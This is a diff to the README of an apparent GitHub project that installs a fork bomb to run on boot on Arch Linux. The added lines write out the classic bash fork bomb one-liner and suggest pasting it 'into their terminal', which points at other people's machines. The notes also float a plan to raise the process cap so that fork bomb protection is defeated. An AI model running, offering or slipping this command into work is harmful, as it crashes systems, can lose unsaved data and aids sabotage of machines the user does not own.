MagicExployter/Fork-bomb-on-boot-for-Arch/README.md

 Notes:
 - Will not work if the OS has fork bomb protection.
 This caps the amount of procceses allowed to be created
+- Might work on some other OS's beside Arch, idk tho.
+If u want the same thing but it crashes the PC once, and doesnt start on boot, just paste :(){ :|: & };: into their terminal
 - Do NOT run this outside a Virtual Machine because it's not gonna be fun
-- also, in the future, I might make it so that it disables fork bomb protection by raising the proccess limit cap, probably not tho I'm too lazy
+- Also, in the future, I might make it so that it disables fork bomb protection by raising the proccess limit cap, probably not tho I'm too lazy
 - I mighty get banned for this idk